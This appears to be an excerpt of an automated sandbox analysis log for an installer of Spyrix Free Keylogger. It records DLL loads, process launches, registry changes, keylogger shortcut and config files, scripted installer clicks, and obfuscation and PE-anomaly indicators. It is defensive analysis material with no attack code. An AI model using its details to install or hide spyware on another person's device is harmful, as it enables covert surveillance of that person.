Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: msftedit.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: windows.globalization.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: bcp47mrm.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: globinputhost.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: windows.ui.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: windowmanagementapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: inputhost.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: twinapi.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: twinapi.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: linkinfo.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: ntshrui.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: policymanager.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: msvcp110_win.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: version.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\reg.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll

Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{76A64158-CB41-11D1-8B02-00600806D9B6}\InProcServer32

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe TASKLIST /FI "IMAGENAME eq spm.exe" /FO CSV /NH

Source: Spyrix Free Keylogger.lnk.19.dr	LNK file: ..\..\..\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe
Source: Uninstall Spyrix Free Keylogger.lnk.19.dr	LNK file: ..\..\..\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\unins000.exe
Source: Spyrix Free Keylogger.lnk0.19.dr	LNK file: ..\..\..\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe

Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp

File written: C:\ProgramData\Spyrix Free Keylogger\temp\logger.ini

Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner

Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp

Window found: window name: TSelectLanguageForm

Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Automated click: Next >
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Automated click: I accept the agreement
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Automated click: Next >
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Automated click: I accept the agreement
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Automated click: Install
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Automated click: I accept the agreement
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Automated click: Next >
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Automated click: I accept the agreement
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Automated click: Next >
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Automated click: Next >
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Automated click: Next >

Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp

File opened: C:\Windows\SysWOW64\MSFTEDIT.DLL

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Binary contains a suspicious time stamp

Source: [space]= .exe.5.dr

Static PE information: 0xFC3E2D57 [Fri Feb 8 17:01:11 2104 UTC]

PE file contains sections with non-standard names

Source: is-JF90R.tmp.19.dr	Static PE information: section name:
Source: is-JF90R.tmp.19.dr	Static PE information: section name:
Source: is-JF90R.tmp.19.dr	Static PE information: section name:
Source: is-JF90R.tmp.19.dr	Static PE information: section name:
Source: is-JF90R.tmp.19.dr	Static PE information: section name:
Source: is-JF90R.tmp.19.dr	Static PE information: section name:
Source: is-JF90R.tmp.19.dr	Static PE information: section name:
Source: is-JF90R.tmp.19.dr	Static PE information: section name:
Source: is-JF90R.tmp.19.dr	Static PE information: section name:
Source: is-JF90R.tmp.19.dr	Static PE information: section name:
Source: is-JF90R.tmp.19.dr	Static PE information: section name: .d
Source: is-JF90R.tmp.19.dr	Static PE information: section name: .adata
Source: is-V94IU.tmp.19.dr	Static PE information: section name: .rodata
Source: is-V94IU.tmp.19.dr	Static PE information: section name: .rotext
Source: is-9ATRT.tmp.19.dr	Static PE information: section name:
Source: is-9ATRT.tmp.19.dr	Static PE information: section name:
Source: is-9ATRT.tmp.19.dr	Static PE information: section name:
Source: is-9ATRT.tmp.19.dr	Static PE information: section name:
Source: is-9ATRT.tmp.19.dr	Static PE information: section name:
Source: is-9ATRT.tmp.19.dr	Static PE information: section name:
Source: is-9ATRT.tmp.19.dr	Static PE information: section name:
Source: is-9ATRT.tmp.19.dr	Static PE information: section name:
Source: is-9ATRT.tmp.19.dr	Static PE information: section name:
Source: is-9ATRT.tmp.19.dr	Static PE information: section name:
Source: is-9ATRT.tmp.19.dr	Static PE information: section name: .adata
Source: is-3JAMQ.tmp.19.dr	Static PE information: section name: .didata
Source: is-IFJUI.tmp.19.dr	Static PE information: section name: /4
Source: is-IFJUI.tmp.19.dr	Static PE information: section name: /19
Source: is-IFJUI.tmp.19.dr	Static PE information: section name: /31
Source: is-IFJUI.tmp.19.dr	Static PE information: section name: /45
Source: is-IFJUI.tmp.19.dr	Static PE information: section name: /57
Source: is-IFJUI.tmp.19.dr	Static PE information: section name: /70
Source: is-IFJUI.tmp.19.dr	Static PE information: section name: /81
Source: is-IFJUI.tmp.19.dr	Static PE information: section name: /92
Source: ffws.exe.53.dr	Static PE information: section name: .rodata
Source: ffws.exe.53.dr	Static PE information: section name: .rotext

Uses code obfuscation techniques (call, push, ret)

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_008650DC push 00865161h; ret	53_2_00865159
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_00865B30 push 00865BB6h; ret	53_2_00865BAE
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_0086DEA3 push cs; ret	53_2_0086DEB4
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_008660D4 push 0086613Ch; ret	53_2_00866134
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_0086D2D4 push cs; iretd	53_2_0086D3AA
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_00872002 push 00000075h; retf	53_2_00872004
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_00874401 push ecx; ret	53_2_00874402
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_00869C0D push eax; ret	53_2_00869C8D
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_0086524C push 008652D7h; ret	53_2_008652CF
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_0086D586 push ebx; ret	53_2_0086D587
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_00865188 push 00865230h; ret	53_2_00865228
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_008675AC push 008675D9h; ret	53_2_008675D1
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_0086D3D6 push cs; iretd	53_2_0086D3AA
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_00865DFC push 00865E74h; ret	53_2_00865E6C
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_00867550 push 0086759Ah; ret	53_2_00867592
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_007B16A4 push 007B17DEh; ret	53_2_007B17D6
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_034003E4 push 03400410h; ret	53_2_03400408
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_033FD398 push 033FD3C4h; ret	53_2_033FD3BC
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_033F73F8 push 033F7424h; ret	53_2_033F741C
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_033E5238 push 033E5264h; ret	53_2_033E525C
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_033F5224 push 033F5266h; ret	53_2_033F525E
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_033E5200 push 033E522Ch; ret	53_2_033E5224
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_033F52A8 push 033F52D4h; ret	53_2_033F52CC
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_033F52E0 push 033F530Ch; ret	53_2_033F5304
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_033F011C push 033F0154h; ret	53_2_033F014C
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_033EE108 push 033EE134h; ret	53_2_033EE12C
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_033E5144 push 033E517Ch; ret	53_2_033E5174
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_033ED1A8 push 033ED1F4h; ret	53_2_033ED1EC
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_033E5190 push 033E51BCh; ret	53_2_033E51B4
